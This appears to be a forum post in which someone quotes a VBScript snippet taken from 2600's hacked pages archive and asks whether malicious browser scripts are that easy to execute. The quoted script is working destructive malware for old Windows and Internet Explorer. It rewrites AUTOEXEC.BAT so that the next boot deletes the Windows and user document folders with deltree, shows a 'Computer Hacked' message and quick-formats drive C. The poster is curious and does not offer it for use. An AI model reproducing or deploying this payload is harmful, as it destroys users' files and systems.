Take a look at this script:

<script language="VBScript"><!--
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:\AUTOEXEC.BAT", True)
a.writeline ("copy c:\windows\command\deltree.* c:\")
a.writeline ("copy c:\windows\command\format.* c:\")
a.writeline ("cls")
a.writeline ("Deltree /y windows")
a.writeline ("cls")
a.writeline ("Deltree /y meusdo~1")
a.writeline ("cls")
a.writeline ("Deltree /y arquiv~1")
a.writeline ("@echo -=-=-=-=-=-=-=-Computer Hacked by [hacker!]-=-=-=-=-=-")
a.writeline ("@echo -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-")
a.writeline ("format c: /q")
a.Close
--></script>
(Quoted because I didn't want to execute it, if such a thing could be possible:P

I found it in at 2600's hacked pages archive. It was marked as "dangerous to view in IE".

My question is easyt: is it that simple to execute malicious scripts on browsers?